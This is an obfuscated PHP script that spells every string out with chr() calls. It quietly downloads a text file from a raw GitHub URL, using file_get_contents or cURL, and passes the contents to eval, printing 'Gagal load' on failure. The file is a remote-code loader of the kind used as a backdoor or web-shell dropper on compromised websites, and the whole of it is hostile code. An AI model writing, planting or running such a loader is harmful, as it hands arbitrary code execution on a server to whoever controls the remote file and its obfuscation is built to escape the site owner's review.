<?php
$u = chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).
     chr(114).chr(97).chr(119).chr(46).chr(103).chr(105).chr(116).chr(104).chr(117).chr(98).chr(117).chr(115).chr(101).chr(114).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(46).chr(99).chr(111).chr(109).
     chr(47).chr(116).chr(117).chr(109).chr(97).chr(110).chr(56).chr(56).chr(57).chr(51).chr(54).
     chr(47).chr(116).chr(117).chr(109).chr(97).chr(110).chr(107).chr(97).chr(110).
     chr(47).chr(114).chr(101).chr(102).chr(115).
     chr(47).chr(104).chr(101).chr(97).chr(100).chr(115).
     chr(47).chr(109).chr(97).chr(105).chr(110).
     chr(47).chr(111).chr(98).chr(115).chr(49).chr(46).chr(116).chr(120).chr(116);

$content = false;
$allow = call_user_func(chr(105).chr(110).chr(105).chr(95).chr(103).chr(101).chr(116), chr(97).chr(108).chr(108).chr(111).chr(119).chr(95).chr(117).chr(114).chr(108).chr(95).chr(102).chr(111).chr(112).chr(101).chr(110));
$curl_check = call_user_func(chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110).chr(95).chr(101).chr(120).chr(105).chr(115).chr(116).chr(115), chr(99).chr(117).chr(114).chr(108).chr(95).chr(105).chr(110).chr(105).chr(116));

if ($allow) {
    $fgc = chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);
    $content = @call_user_func($fgc, $u);
} elseif ($curl_check) {
    $ch = call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(105).chr(110).chr(105).chr(116), $u);
    call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(115).chr(101).chr(116).chr(111).chr(112).chr(116), $ch, 19913, true);
    call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(115).chr(101).chr(116).chr(111).chr(112).chr(116), $ch, 52, true);
    call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(115).chr(101).chr(116).chr(111).chr(112).chr(116), $ch, 13, 10);
    $content = call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(101).chr(120).chr(101).chr(99), $ch);
    call_user_func(chr(99).chr(117).chr(114).chr(108).chr(95).chr(99).chr(108).chr(111).chr(115).chr(101), $ch);
}

if ($content !== false && trim($content) !== '') {
    eval('?>' . $content);
} else {
    echo chr(71).chr(97).chr(103).chr(97).chr(108).chr(32).chr(108).chr(111).chr(97).chr(100);
}
?>
